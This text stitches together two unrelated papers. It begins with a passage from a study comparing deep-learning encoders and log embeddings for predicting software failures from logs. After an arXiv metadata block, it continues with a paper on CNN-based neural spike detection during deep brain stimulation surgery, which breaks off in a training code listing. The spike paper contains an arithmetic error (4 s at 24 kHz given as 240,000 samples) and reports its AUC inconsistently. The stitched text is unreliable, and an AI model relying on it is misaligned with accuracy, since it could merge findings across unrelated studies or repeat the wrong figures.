Also, note that we need two types of failure patterns (_Type-F_ and _Type-I_), and the failure log sequences generated from the failure patterns must satisfy the dataset characteristics (especially the maximum LSL) defined in § 5.2.2. To manually create such failure patterns (regular expressions) in an unbiased way, we used the following steps for each behavior model and failure pattern type:

1. We randomly choose the alphabet size of a regular expression and the number of operators (i.e., alternations and Kleene stars; the latter is not used for _Type-F_).
2. Using the chosen random values, for a given behavior model \(\mathcal{M}\), we manually create a failure pattern (regular expression) _fp_ that satisfies \(\mathcal{L}(\textit{fp})\subset\mathcal{L}(\mathcal{M})\) and the maximum LSL, within a time limit of 1 hour; if we fail (e.g., if the shortest log in \(\mathcal{L}(\textit{fp})\) is longer than the maximum LSL of 20), we go back and restart from Step 1.
3. We repeat Steps 1 and 2 ten times to generate ten failure patterns and then randomly select three of them.

As a result, we use 18 failure patterns (i.e., 3 failure patterns × 3 behavior models × 2 failure pattern types) for synthetic data generation.

\begin{table} \begin{tabular}{c r r r r} \hline \hline **Model** & **\#Templates** & **\#States** & **\#Transitions** & **\#States-NSCC** \\ \hline \(\mathcal{M}_{1}\) & 70 & 154 & 195 & 5 \\ \(\mathcal{M}_{2}\) & 16 & 91 & 189 & 72 \\ \(\mathcal{M}_{3}\) & 115 & 350 & 486 & 331 \\ \hline \hline \end{tabular} \end{table} Table 4: Overview of Behavioural models

## 6 Results

This section presents the results of RQ1 (DL encoders), RQ2 (log sequence embedding strategies), and RQ3 (dataset characteristics), respectively.

### RQ1: DL Encoders

Figure 4 shows boxplots of the failure prediction accuracy (F1 score) for different DL encoders (i.e., transformer-based, LSTM-based, CNN-based, and BiLSTM-based models) on the datasets generated by different behavior models (i.e., M1, M2, and M3). Each box is generated based on \(360\times 2\) data points since we have 360 combinations of dataset characteristics and two log sequence embedding strategies. In each box, a triangle indicates the mean value.

Figure 4: Failure prediction accuracy for different DL encoders. The triangles additionally indicate mean values.

Overall, the CNN-based model achieves the best performance in terms of F1 score for all behavior models. It has the highest mean values with the smallest interquartile ranges (IQRs), meaning that the CNN-based model consistently works very well regardless of dataset characteristics and log sequence embedding strategies. The BiLSTM-based model also shows promising results. However, the CNN-based model's results are significantly higher for all the behavioral models (paired t-test p-values \(\ll 0.001\)). In contrast, the LSTM-based and transformer-based models show poor results (low F1 scores on average with very large IQRs). These patterns are independent of both the embedding strategy and the behavior model. Further, the large variance for the LSTM-based and transformer-based models suggests that these models are very sensitive to the dataset characteristics. The poor performance of the transformer-based encoder can be explained by the fact that the transformer blocks in the encoder are data-demanding (i.e., requiring much training data). When the dataset size is small (below 1 000), the data-demanding transformer blocks are not well-trained, leading to poor performance.
This limitation is thoroughly discussed in the literature [57]. The LSTM-based encoder, on the other hand, has two simple layers of LSTM units. Recall that an LSTM model sequentially processes a given log sequence (i.e., a sequence of templates), template by template. Although LSTM attempts to address the long-term dependency problem of RNNs by having a _forget gate_ (see § 2.4.1), it is still a recurrent network that has difficulty remembering long input sequences [34]. For this reason, since our log datasets contain long log sequences (up to a length of 1 000), the LSTM-based encoder did not work well. The BiLSTM-based encoder involves LSTM units and therefore has the weakness mentioned above. However, for BiLSTM, the input sequence flows in both directions in the network, utilizing information from both sides. Furthermore, it is enhanced by the attention mechanism, which assigns more weight to the parts of the input that are associated with the failure pattern [53]. Thus, the BiLSTM-based encoder can more easily learn the impact of different log templates on the classification results. However, the attention layer is more data-demanding than the convolution layers (see § 4.2) in the CNN-based encoder, and this explains why the BiLSTM-based encoder does not outperform the CNN-based encoder. The high performance of the BiLSTM-based and CNN-based encoders can also be explained by the number of trainable parameters; for these two encoders, unlike the transformer-based and LSTM-based ones, the number of trainable parameters increases as the input sequences get longer. The larger number of parameters makes the encoders more robust to longer input log sequences. Furthermore, CNN additionally processes spatial information (i.e., conjunctive relationships among templates) using multiple filters with different kernel sizes [20], which makes failure prediction more accurate even when the input size (sequence length) is large. These characteristics make the CNN-based encoder the best choice in our application context.

The answer to RQ1 is that the CNN-based encoder significantly outperforms the other encoders regardless of dataset characteristics and log sequence embedding strategies.

### RQ2: Log Sequence Embedding Strategies

Figure 5 shows the boxplots of the failure prediction accuracy (F1 score) for the different log sequence embedding strategies considered in this study (i.e., BERT and Logkey2vec) on the datasets generated by the three behaviour models (M1, M2, and M3). Each box is generated based on \(360\times 4\) data points since we have 360 combinations of dataset characteristics and four DL encoders. Similar to Figure 4, the triangle in each box indicates the mean value. We now inspect these plots with the aim of answering our research question; the plots based on precision and recall are excluded since they lead to similar conclusions. Figure 5 shows that the BERT embedding strategy performs better than Logkey2vec for all behaviour models, with higher mean values and smaller IQRs. This means that, on average, over all DL encoders, the semantic-aware log sequence embedding using BERT fares better than the embedding that solely relies on log template IDs using Logkey2vec, which does not account for the semantic information of templates. To better understand the impact of log sequence embedding strategies on the performance of different DL encoders, we additionally performed paired t-tests to compare the F1 score distributions of BERT and Logkey2vec for each of the four DL encoders.
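For illustration, such a comparison can be run with SciPy's paired t-test; the arrays below are placeholders for the per-dataset F1 scores of the two embedding strategies under the same encoder.

```python
import numpy as np
from scipy import stats

# Placeholder arrays: F1 scores over the same 360 datasets under one DL encoder,
# once with BERT embeddings and once with Logkey2vec embeddings.
f1_bert = np.random.default_rng(0).uniform(0.7, 1.0, size=360)
f1_logkey2vec = np.random.default_rng(1).uniform(0.7, 1.0, size=360)

t_stat, p_value = stats.ttest_rel(f1_bert, f1_logkey2vec)  # paired t-test
print(f"t = {t_stat:.3f}, p = {p_value:.4f}")
```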
Table 5 reports the statistical test results. For example, the low p-value in column _M2_ and row _CNN_ indicates that Logkey2vec is significantly better than BERT when the CNN-based encoder is used on datasets generated by the M2 behaviour model.

\begin{table} \begin{tabular}{c r r r r} \hline \hline **DL encoder** & **M1** & **M2** & **M3** & **All** \\ \hline CNN & 0.572 & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) \\ BiLSTM & 0.001 & 0.001 & 0.018 & \(\ll 0.001\) \\ transformer & \(\ll 0.001\) & 0.505 & 0.032 & \(\ll 0.001\) \\ LSTM & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) \\ \hline **All** & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) & \(\ll 0.001\) \\ \hline \hline \end{tabular} \end{table} Table 5: Paired t-test results (p-values). A level of significance \(\alpha=0.01\) is used. A gray background indicates that Logkey2vec outperforms BERT; otherwise, BERT outperforms Logkey2vec.

Figure 5: Failure prediction accuracy for different log sequence embedding strategies. The triangles additionally indicate mean values.

Interestingly, BERT is statistically better than or equal to Logkey2vec for all DL encoders except the CNN-based encoder (i.e., the best-performing DL encoder as investigated in § 6.1), a trend that is clearly observable in Figure 6, which depicts the F1 score distributions of BERT and Logkey2vec for the CNN encoder. In other words, the combination of the CNN-based encoder and the Logkey2vec embedding strategy is the best combination of DL encoders and log sequence embedding strategies. Although, in contrast to BERT, Logkey2vec does not consider the semantic information of log templates, it accounts for the order of template IDs in each log sequence. Furthermore, Logkey2vec is trained together with the DL encoder, while BERT is pre-trained independently from the DL encoder. We suspect that such characteristics of Logkey2vec play a positive role in combination with the CNN-based encoder. We note that BERT is still an attractive strategy for log sequence embedding when any encoder other than CNN is used. Although BERT is considerably larger than Logkey2vec in terms of parameters, using BERT does not require significantly more time and resources than Logkey2vec since BERT minimises repeated calculations by mapping each log template ID to its corresponding BERT embedding vector.

The answer to RQ2 is that the performance of the log sequence embedding strategies varies depending on the DL encoders used. Although BERT outperforms Logkey2vec overall across all encoders, Logkey2vec outperforms BERT when the CNN-based encoder is used.

Figure 6: Failure prediction accuracy of the CNN-based model for different log sequence embedding strategies; triangles indicate mean values.

Figure 7: Failure prediction accuracy of the CNN-based encoder with Logkey2vec for different dataset characteristics.

### RQ3: Dataset Characteristics

Figure 7 shows the distributions of F1 scores according to different dataset characteristic values. We only use the data generated by the best combination of the DL encoder and the log sequence embedding strategy, i.e., the CNN-based encoder and Logkey2vec, based on the results from RQ1 and RQ2. Below, we discuss how the failure prediction accuracy of the best-performing combination varies with each of the dataset characteristics. In Figure 7(a), we can see the impact of dataset size on the failure prediction accuracy; it is clear that accuracy decreases with smaller datasets, regardless of the behaviour models used to generate the log datasets.
For example, when the dataset size is 200, accuracy goes down below 0.7 in the worst case, whereas it always stays very close to 1.0 when the dataset size is greater than or equal to 5 000. Since larger datasets imply more training data, this result is intuitive. Figure 7(b) depicts the impact of maximum LSL values (_mlsl_) on the failure prediction accuracy. Compared to the impact of dataset size, we can see that the impact of log sequence length is relatively small. This implies that the CNN-based encoder with the Logkey2vec embedding strategy works fairly well for log sequence lengths of up to 1 000. We suspect that the impact of log sequence length could become significant for much longer log sequences. However, log sequences longer than 1 000 are not common in publicly available, real-world log datasets [32], as explained in Section 5.2.2. Nevertheless, the investigation of much longer log sequences remains for future work.

The relationship between the failure percentage and the failure prediction accuracy (F1 score) is depicted in Figure 7(c). It is clear that, overall, the F1 score increases as the failure percentage increases. This is intuitive since a larger failure percentage means more instances of failure patterns in the training data, making it easier to learn such patterns. An interesting observation is that the average failure prediction accuracy is above 0.9 even when the failure percentage is 10%. This implies that the failure predictor (i.e., DL encoder and log sequence embedding strategy) can cope well with unbalanced data.

Figure 7(d) shows the failure prediction accuracy for different failure pattern types. There is no consistent trend across models M1, M2, and M3; Type-F (whose corresponding language is finite) is better detected than Type-I (whose corresponding language is infinite) in M2 and M3, whereas the opposite happens in M1. Considering the complexity of failure patterns, it is unclear why, in M1, detecting less complex failure patterns (Type-F) is more difficult than detecting more complex patterns (Type-I). We may not have defined failure pattern types in a way that is conducive to explaining variations in accuracy, and different hypotheses will have to be tested in future work with respect to which pattern characteristics matter.

We focused above on the impact of individual characteristics on the accuracy of failure prediction, not their combinations. To identify conditions describing how the failure prediction accuracy of the best-performing failure predictor (i.e., the CNN-based encoder with the Logkey2vec embedding strategy) varies according to combinations of dataset characteristics, we built a regression tree [4] in which we explain variations in F1 scores according to dataset characteristics. Out of 1 080 data points (\(360\times 3\), since we have 360 data points for each of the three behavior models), we used 720 (66.7%) and 360 (33.3%) of them, respectively, for training and testing the tree. Figure 8 shows the resulting regression tree; each non-leaf node presents a partial condition and each leaf node presents the predicted accuracy under the condition corresponding to the path from the root to the leaf. For example, the left-most leaf node means that the average failure prediction accuracy is predicted to be 0.516 if the dataset size is less than 350 _and_ the failure percentage is less than 7.5. Otherwise, the average failure prediction accuracy will be at least 0.9.
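A tree of this kind can be fit with scikit-learn along the following lines; this is only a sketch, with hypothetical column names, a hypothetical results file, and an assumed depth limit.

```python
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeRegressor, export_text

# `results` is assumed to have one row per generated dataset, with its
# characteristics and the F1 score of the CNN + Logkey2vec predictor.
results = pd.read_csv("f1_results.csv")          # hypothetical file
X = results[["dataset_size", "max_lsl", "failure_percentage", "is_type_f"]]
y = results["f1_score"]

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=1/3,
                                                    random_state=0)
tree = DecisionTreeRegressor(max_depth=3, random_state=0)  # depth is assumed
tree.fit(X_train, y_train)
print(export_text(tree, feature_names=list(X.columns)))    # conditions, as in Figure 8
```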
Further, we calculated the IQR of the F1 scores when the conditions for high accuracy are met; the IQR is below 0.01. From the tree, it is clear that dataset size and failure percentage are the two main factors that explain failure prediction accuracy. Furthermore, we can see that the CNN-based encoder with the Logkey2vec embedding works very well, except when both the dataset size and the failure percentage are small. The practical implication of this finding will be further discussed in Section 7.

The answer to RQ3 is that, for the CNN-based encoder with the Logkey2vec embedding strategy, increasing the dataset size and failure percentage significantly increases the failure prediction accuracy, whereas the other factors (i.e., LSL and failure pattern type) do not have a clear relationship with failure prediction accuracy. In particular, the failure predictor is very accurate (F1 score above 0.95) and robust (IQR below 0.01) when the dataset size is above 350 or the failure percentage is above 7.5%.

### Replication package

We plan to make the replication package, including the implementation, the generated datasets with behavioural models, and the results, publicly available upon acceptance.

Figure 8: Regression Tree for the CNN-based Model explaining variations in F1 scores

## 7 Discussion

### Findings and Implications

Our study leverages the main DL types (LSTM, CNN, and transformer), along with different log sequence embedding (LSE) strategies (BERT and Logkey2vec). In contrast to the other studies mentioned in Table 1, all combinations of DL types and LSE strategies are evaluated. Moreover, instead of using a limited number of datasets, using generated data enables us to control dataset characteristics to identify necessary conditions for achieving high-accuracy models. Several major findings are reported in § 6. First, the CNN-based DL encoder fares the best among the different DL encoders, including the ones based on LSTMs, transformers, and BiLSTMs. Second, the CNN-based DL encoder works best with the Logkey2vec embedding strategy, although BERT fares better than Logkey2vec overall across all DL encoders. Third, for the best combination, i.e., the CNN-based encoder with Logkey2vec, both the size and the failure percentage of input log datasets significantly drive the failure prediction accuracy, whereas the log sequence length and the failure pattern type do not. Last but not least, we found that the best combination works well if either the dataset size is above 350 or the failure percentage is above 7.5%.

These findings carry practical implications for both researchers and engineers. Although the CNN-based DL encoder and the Logkey2vec embedding strategy are not the most recent techniques in their respective fields, interestingly, their combination works best for failure prediction. Based on this finding, we can recommend using the CNN-based encoder with Logkey2vec for accurate failure prediction among the various combinations of DL encoders and log sequence embedding strategies. However, we have explored the ranges of dataset characteristics that have been observed in the literature; different results may be observed beyond these ranges and for different failure patterns. Furthermore, the conditions driving failure prediction accuracy suggest practical guidelines. For example, for a log dataset size below 350 and a failure percentage below 7.5%, failure prediction will be inaccurate. In that case, one can increase either the log dataset size or the failure percentage to improve the situation.
Although the failure percentage is inherent to the system under analysis and might not be easy to control in practice, collecting more log sequences during the operation of the system to increase the dataset size is usually feasible.

### Threats to Validity

There are a number of potential threats to the validity of our experimental results.

**Hyper-parameter tuning of models.** The hyper-parameters of failure predictors, such as optimizers, loss functions, and learning rates, can affect the results. To mitigate this, we followed recommendations from the literature. For the batch size and the number of epochs, as mentioned in § 5.2.3, we chose values for different combinations of dataset characteristics based on preliminary evaluation results. Better results could be obtained with different choices.

**Synthetic data generation process.** Due to the lack of a method to generate datasets satisfying the different dataset characteristics mentioned in § 5.3.1, we proposed a new approach, with precise algorithms, that can generate datasets in a controlled, unbiased manner, as discussed in § 5.3. To mitigate any risks related to synthetic generation, we provided a proof of the correctness of the algorithms and explained why the generation process is unbiased. To further support the validity of the generation process, we compared results on actual datasets reported in the literature with those obtained on synthesised datasets with corresponding key parameters (e.g., dataset sizes and failure percentages). The results are remarkably consistent, thus backing up the validity of our experiments. For example, a BiLSTM-based model in the study of Le and Zhang [32] achieves results comparable to those obtained on synthesised data with similar characteristics3.

Footnote 3: Using the real-world BGL and Spirit datasets, the failure predictor achieved F1 scores of 1.0 and 0.95, respectively, while the F1 scores on similar synthesised datasets using the same DL type as the encoder are 0.99 and 0.99.

**Behavioral models and failure patterns.** The behavioral models and failure patterns used for the generation of synthetic datasets may have a significant impact on the experimental results. We want to remark that this is the first attempt to characterise failure patterns for investigating failure prediction performance. To mitigate this issue, we carefully chose them based on the pre-defined criteria described in § 5.4. Nevertheless, more case studies, especially considering finer-grained failure patterns, are required to increase the generalizability of our findings and implications; for that purpose, we provide in our replication package all the required artifacts.

**Possible bugs in the implementation.** The implementation of the DL encoders, the log sequence embedding strategies, the dataset generation algorithms, and the scripts used in our experiments might include unexpected bugs. To mitigate this risk, we used the replication packages of existing studies [8, 31] as much as possible. Also, we carefully performed code reviews.

## 8 Conclusion

In this paper, we presented a comprehensive and systematic evaluation of alternative failure prediction strategies relying on DL encoders and log sequence embedding strategies. We presented a generic, modular architecture for failure prediction which can be configured with specific DL encoders and embedding strategies, resulting in different failure predictors. We considered BERT and Logkey2vec as embedding strategies.
We also covered the main DL categories, plus the attention mechanism, resulting in four DL encoders (LSTM-, BiLSTM-, CNN-, and transformer-based). Our selection was inspired by the DL models previously used in the literature. We evaluated the failure prediction models on diverse synthetic datasets generated using three behavioural models inferred from available system logs. Four dataset characteristics were controlled when generating datasets: dataset size, failure percentage, Log Sequence Length (LSL), and failure pattern type. Using these characteristics, 360 datasets were generated for each of the three behavioral models. Evaluation results show that the accuracy of the CNN-based encoder is significantly higher than that of the other encoders, regardless of dataset characteristics and embedding strategies. Between the two embedding strategies, the pretrained BERT outperformed the trainable Logkey2vec overall, although Logkey2vec fared better with the CNN-based encoder. The analysis of dataset characteristics confirms that increasing the dataset size and the failure percentage increases the failure prediction accuracy, while the other factors (i.e., LSL and failure pattern type) did not show a clear relationship with failure prediction accuracy. Furthermore, the best configuration (i.e., CNN-based with Logkey2vec) consistently yielded high accuracy when the dataset size was above 350 _or_ the failure percentage was above 7.5%, which makes it widely usable in practice. As part of future work, we plan to further evaluate the best-performing configuration of the failure prediction architecture on real-world log data to investigate the effect of other factors, such as log parsing techniques, on model accuracy. Additionally, by using real-world data, we also plan to include time-aware evaluation metrics, such as lead time [47], to assess the accuracy of these models at predicting failures early on.
2308.05755
Deep learning for spike detection in deep brain stimulation surgery
Deep brain stimulation (DBS) is a neurosurgical procedure successfully used to treat conditions such as Parkinson's disease. Electrostimulation, carried out by implanting electrodes into an identified focus in the brain, makes it possible to reduce the symptoms of the disease significantly. In this paper, a method for analyzing recordings of neuronal activity acquired during DBS neurosurgery using deep learning is presented. We tested using a convolutional neural network (CNN) for this purpose. Based on the time window, the classifier assesses whether neuronal activity (spike) is present. The maximum accuracy value for the classifier was 98.98%, and the area under the receiver operating characteristic curve (AUC) was 0.9898. The method made it possible to obtain a classification without using data preprocessing.
Arkadiusz Nowacki, Ewelina Kołpa, Mateusz Szychiewicz, Konrad Ciecierski
2023-08-04T13:15:05Z
http://arxiv.org/abs/2308.05755v1
# Deep learning for spike detection in deep brain stimulation surgery ###### Abstract Deep brain stimulation (DBS) is a neurosurgical procedure successfully used to treat conditions such as Parkinson's disease. Electrostimulation, carried out by implanting electrodes into an identified focus in the brain, makes it possible to reduce the symptoms of the disease significantly. In this paper, a method for analyzing recordings of neuronal activity acquired during DBS neurosurgery using deep learning is presented. We tested using a convolutional neural network (CNN) for this purpose. Based on the time window, the classifier assesses whether neuronal activity (spike) is present. The maximum accuracy value for the classifier was 98.98%, and the area under the receiver operating characteristic curve (AUC) was 0.9898. The method made it possible to obtain a classification without using data preprocessing. Keywords:deep learning convolutional neural network medical diagnosis DBS deep brain stimulation spike ## 1 Introduction and Problem Formulation Deep brain stimulation (DBS) is an efficient method in the field of neurosurgery, which not only can be used to treat Parkinson's disease but also Tourette's syndrome, movement, and anxiety disorders [10]. This is a more efficient method for the localization of a small structure Subthalamic Nucleus than standard imaging techniques such as CT and MRI. The main essence of DBS is the modulation of specific structures in the brain by electrical impulses generated with a frequency of 100-200 Hz via surgically implanted electrodes in specific brain regions. These electrodes emit electrical impulses that can modulate the activity of neurons, which can help to alleviate symptoms of conditions such as dystonia and essential tremor. Due to its clinical effectiveness, scientists are still looking for alternative ways to use it in psychiatry and other fields of medicine. To ensure that the electrodes are placed in the optimal location, doctors use spike detection to identify the specific neural activity that is associated with the condition being treated. Once the electrodes are in place, spike detection can also be used to monitor the effects of DBS treatment over time. By measuring the neural activity before and after DBS, doctors can determine if the treatment has the desired effect and adjust the stimulation parameters as needed. Additionally, spike detection can be used to detect any side effects of DBS treatment, such as changes in cognitive function or mood. The following parts of this work will discuss related scientific studies on data acquisition, cleaning of artifacts, and spike detection. The developed methods of spike detection using deep learning, data analysis on which experiments were carried out, and their results will also be described. The paper proposes the use of a convolutional neural network for spike detection. The model was trained on real data obtained during the DBS operation. Additionally, the impact of the training data on accuracy, precision, recall, and F1 score is considered. ## 2 Related Work ### Spike detection A neural spike, also known as an action potential, is a brief, rapid change in the electrical potential of a neuron. This is due to the rapid influx of positively charged ions into the cell, causing the membrane potential to change rapidly from negative to positive[6]. Spike detection identifies the presence of nerve impulses in an electrophysiological signal, such as EEG or extracellular recording. 
There are various methods for detecting spikes in neural signals, including: 1. threshold-based methods 2. wavelet-based methods 3. template matching 4. spectral method Threshold-based methods involve setting a threshold value; any signal exceeding that threshold is considered a spike. Wavelet-based methods use wavelet transforms to decompose the signal into different frequency bands and then identify spikes based on wavelet coefficients. Template matching involves creating a peak waveform template and then using that template to detect signal spikes. The spectral method is based on the power spectral density of signals and is used to detect high-frequency spikes[12]. ### Deep learning in brain waves analysis Deep learning is a subfield of machine learning that uses neural networks with multiple layers to analyze complex data. Much work has been done on EEG analysis in terms of using deep learning to analyze brainwaves. In the context of brainwave analysis, deep learning techniques such as convolutional neural networks (CNNs) and recurrent neural networks (RNNs) can be used to analyze large amounts of electroencephalography data, identifying patterns and features that are indicative of different cognitive states[11]. Convolutional neural networks (CNNs) are particularly well suited for analyzing electroencephalography data, as they can learn spatial representations of the data by applying filters to small regions of the input data. This allows them to identify patterns in the electroencephalography data specific to certain brain regions or cognitive states[11]. Recurrent neural networks (RNNs) are another type of deep learning algorithm that can be used in brainwave analysis. RNNs can process sequential data, such as time series data, and learn patterns in the data that span multiple time steps. This makes them well suited for analyzing electroencephalography data, as signals are time series data that change over time[1]. Deep learning techniques such as deep belief networks (DBNs) and autoencoders (AEs) are also used for EEG-based brain-computer interfaces (BCIs) and for identifying abnormal brain activities such as seizures and sleep disorders[9]. ## 3 Deep Learning-based Algorithm for Spike Detection ### Input Dataset Description The analyzed data came from recordings made during deep brain stimulation surgery. The sampling device took data at a frequency of 24 kHz. Such frequency means that there are 24 samples per 1 ms of recording. Each recording is 4s long, giving 240000 samples per recording. To create the dataset, the data was processed to obtain the timestamps in which the spikes occurred. The recordings contain a lot of noise and interference. To better detect spikes, has been carried out data renormalization. The renormalization was based on the median absolute deviation (MAD). MAD is calculated by finding the median of a data set and then finding the absolute difference between each data point and the median. The median of absolute differences is then taken as a measure of the dispersion or variability of the data set[4]. \[MAD=median(|X-median(X)|)\frac{1}{0.6745} \tag{1}\] Where: * \(X\): is the dataset * \(median(X)\): is the median of the dataset * \(|x-median(x)|\): is the absolute difference between each data point and the median of the dataset The constant \(\frac{1}{0.6745}\) is used to make the MAD comparable to the standard deviation for a normal distribution[8]. 
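The MAD-based renormalization of Eq. (1) can be stated compactly in code. The following is a minimal Python/NumPy sketch, assuming a single-channel recording stored as a 1-D array; the function name and the choice to also centre the signal on its median are ours, not taken from the paper.

```python
import numpy as np

def mad_renormalize(signal):
    """Rescale a raw recording so that the noise SD is approximately 1, using the
    MAD of Eq. (1): median(|X - median(X)|) / 0.6745."""
    med = np.median(signal)
    mad = np.median(np.abs(signal - med)) / 0.6745  # comparable to the SD for Gaussian noise
    return (signal - med) / mad

# Example: 4 s of recording sampled at 24 kHz (24 samples per millisecond)
fs = 24_000
raw = np.random.randn(4 * fs)      # stand-in for one 240,000-sample recording
normalized = mad_renormalize(raw)
print(np.std(normalized))          # close to 1 for noise-dominated data
```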
Renormalization aims to rescale the raw data such that the standard deviation (SD) of the noise is approximately 1. Exact scaling may not be feasible, but the MAD closely approximates the noise SD (Figure 1). Renormalization using MAD can help when recordings are multichannel, as it allows electrode/channel values to be compared with each other. Spike detection involves selecting local extremes above a designated threshold. The data is first filtered using a box filter (a moving average) to reduce high-frequency noise[7]. The box filter works by averaging the data over a specific time window, smoothing out high-frequency signal fluctuations. This can help improve spike detection because it reduces the impact of noise on the detection process. Figure 1: Samples from the recording before (left) and after (right) renormalization. In red: +/- the MAD; in dashed blue: +/- the SD. Figure 2: Sample from the recording with the detection threshold (dashed blue) and the filtered and rectified trace (red). The SD value determines the detection threshold, which can be a multiple of the SD or the SD value itself. Based on the crossing of this threshold, sites where a spike could occur are selected (Figure 2). Spike detection then involves checking the selected samples: the absolute values of the detected spikes and their minimum distances from each other are checked[7]. This makes it possible to filter out distorted, overlapping spikes. In this way, timestamps were obtained at which spikes occur (Figure 3). Figure 3: Raw data with a detected spike (red dot). Spikes usually last about one millisecond[5]. To create a training and validation dataset, time windows were stretched around the timestamps. As the device operates at a frequency of 24 samples per millisecond, time windows of 48 samples were created. The time windows were created using the raw data before renormalization (Figure 4). The resulting data was divided into a training and a validation dataset at a ratio of 80:20. ### Neural network In order to detect spikes, a binary classifier based on a convolutional neural network was created. Deep learning with convolutional neural networks has yielded promising results in EEG classification problems[11]. The architecture of the created network is shown in Figure 5. The size of the input data corresponds to the size of the time window: the recordings are single-channel and the window is 48 samples long, so the input vector is 1x48. The input data is first processed by several one-dimensional convolution layers. The Leaky Rectified Linear Unit (Leaky ReLU) is used here: unlike the standard ReLU, whose value is equal to 0 for negative inputs, the function has a small non-zero slope for negative values[13]. A block consisting of dropout, a one-dimensional convolutional layer, and Leaky ReLU was then applied. The block is designed to extract all the necessary information regarding the time window and the presence of a spike in it, and it is repeated six times. The data is then reduced to the target output size. The output has the form 2x1, and the two outputs correspond to the binary classification: no spike (or presence of noise) and presence of a spike. To process the data in this way, two layers were used: a one-dimensional convolutional layer and a sigmoid. The sigmoid normalizes the outputs to the interval 0-1[3]; the larger of the two values thus indicates the classifier's prediction.
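For illustration, a minimal PyTorch sketch of this architecture is given below. The 1x48 input window, the six repeated (dropout, Conv1d, Leaky ReLU) blocks, and the two sigmoid-normalized outputs follow the text; the channel widths, kernel sizes, and dropout rate are not specified in the paper and are chosen here only as placeholders.

```python
import torch
import torch.nn as nn

class SpikeClassifier(nn.Module):
    """Sketch of the described network: initial Conv1d + LeakyReLU layers, six repeated
    (Dropout, Conv1d, LeakyReLU) blocks, and a Conv1d + Sigmoid head producing two
    outputs (no spike / spike). Widths, kernel sizes and dropout rate are guesses."""
    def __init__(self, channels=16, kernel=3, p_drop=0.2, n_blocks=6):
        super().__init__()
        self.stem = nn.Sequential(
            nn.Conv1d(1, channels, kernel, padding=kernel // 2), nn.LeakyReLU(),
            nn.Conv1d(channels, channels, kernel, padding=kernel // 2), nn.LeakyReLU(),
        )
        blocks = []
        for _ in range(n_blocks):
            blocks += [nn.Dropout(p_drop),
                       nn.Conv1d(channels, channels, kernel, padding=kernel // 2),
                       nn.LeakyReLU()]
        self.blocks = nn.Sequential(*blocks)
        # Collapse the 48-sample window into two class scores with a final convolution.
        self.head = nn.Sequential(nn.Conv1d(channels, 2, kernel_size=48), nn.Sigmoid())

    def forward(self, x):                 # x: (batch, 1, 48)
        x = self.stem(x)
        x = self.blocks(x)
        return self.head(x).squeeze(-1)   # (batch, 2); the larger value is the prediction

model = SpikeClassifier()
window = torch.randn(8, 1, 48)            # a batch of eight 48-sample windows
print(model(window).shape)                # torch.Size([8, 2])
```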
## 4 Numerical Experiments and Performance Evaluation ### Neural Network Training The classifier was trained for 15 epochs. For every epoch, a checkpoint of the trained model was created, and its metric values were saved. The loss function is Binary Cross Entropy, the learning rate was set to 0.001, and Adaptive Moment Estimation (Adam) was chosen as the optimizer. Figure 4: Sample time window with spike. Figure 5: Structure of the neural network (top) and the structure of the sequence, repeated six times (bottom). The following metrics have been checked: 1. accuracy 2. precision 3. recall 4. \(F_{1}\) score Accuracy is a commonly used metric to evaluate the performance of a classification model. It is the ratio of the number of correct predictions made by the model to the total number of predictions made. Accuracy is between 0 and 1, where 1 is perfect accuracy, and 0 is no accuracy[2]. \[ACC=\frac{TP+TN}{TP+TN+FN+FP} \tag{2}\] Precision is the ratio of the number of true positive predictions (i.e., the number of times the model correctly predicted the positive class) to the total number of positive predictions made by the model. Precision is between 0 and 1, where 1 means perfect precision and 0 means no precision[2]. \[Precision=\frac{TP}{TP+FP} \tag{3}\] The recall is the ratio of the number of true positive predictions (i.e., the number of times the model correctly predicted the positive class) to the total number of positive instances in the dataset. The recall is between 0 and 1, where 1 represents perfect recall, and 0 represents no recall[2]. \[Recall=\frac{TP}{TP+FN} \tag{4}\] The \(F_{1}\) score balances precision and recall, giving equal weight to both. A high \(F_{1}\) score means the model has both high precision and high recall. \[F_{1}=2\cdot\frac{Precision\cdot Recall}{Precision+Recall} \tag{5}\] Before the actual training, the number of blocks containing dropout, a one-dimensional convolutional layer, and Leaky ReLU was selected. The average values of the accuracy metric over 15 epochs were compared; the values are reported in Table 1. Based on the comparison, six blocks were selected. Admittedly, nine and twelve blocks achieved higher average accuracy, but they significantly increased training and prediction times, with minimal accuracy gains. The training was done using the dataset described in the previous chapter. ### Results of Experiments Classifier training was carried out in several variants, using 25%, 50%, 75%, and 100% of the training set, to test how much data the network needs to achieve promising results. The results for the best models are presented in Table 2. The best results were achieved by the model for which the entire available training set was used: the accuracy was 0.9898 and the \(F_{1}\) score was 0.9898 (both values were the highest in the entire comparison). It is worth noting that high metric values were also achieved by the models trained on 50% and 75% of the original training set. Confusion matrices were created to illustrate the results (Figure 6). The validation set consisted of 9762 examples. The best model achieved high values for True Positive (4852) and True Negative (4810), which corresponds to correct answers for 98% of the true negatives and over 99% of the true positives. In order to check how well the classifier distinguishes between the classes, the ROC curve was plotted (Figure 7). The area under the curve (AUC) was 0.990.
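The training setup and the metrics of Eqs. (2)-(5) can be sketched as follows. This is a minimal illustration, assuming the model and data loaders are supplied by the caller and that labels are one-hot encoded; these details are not spelled out in the paper.

```python
import torch
import torch.nn as nn

def binary_metrics(pred, target):
    """Accuracy, precision, recall and F1 from Eqs. (2)-(5); pred/target are 0/1 tensors."""
    tp = int(((pred == 1) & (target == 1)).sum())
    tn = int(((pred == 0) & (target == 0)).sum())
    fp = int(((pred == 1) & (target == 0)).sum())
    fn = int(((pred == 0) & (target == 1)).sum())
    acc = (tp + tn) / max(tp + tn + fp + fn, 1)
    prec = tp / max(tp + fp, 1)
    rec = tp / max(tp + fn, 1)
    f1 = 2 * prec * rec / max(prec + rec, 1e-12)
    return acc, prec, rec, f1

def train(model, train_loader, val_loader, epochs=15, lr=0.001):
    """Training loop following the described setup: Binary Cross Entropy loss,
    Adam with lr = 0.001, 15 epochs, one checkpoint per epoch."""
    criterion = nn.BCELoss()
    optimizer = torch.optim.Adam(model.parameters(), lr=lr)
    for epoch in range(epochs):
        model.train()
        for windows, labels in train_loader:      # labels: one-hot, shape (batch, 2)
            optimizer.zero_grad()
            loss = criterion(model(windows), labels)
            loss.backward()
            optimizer.step()
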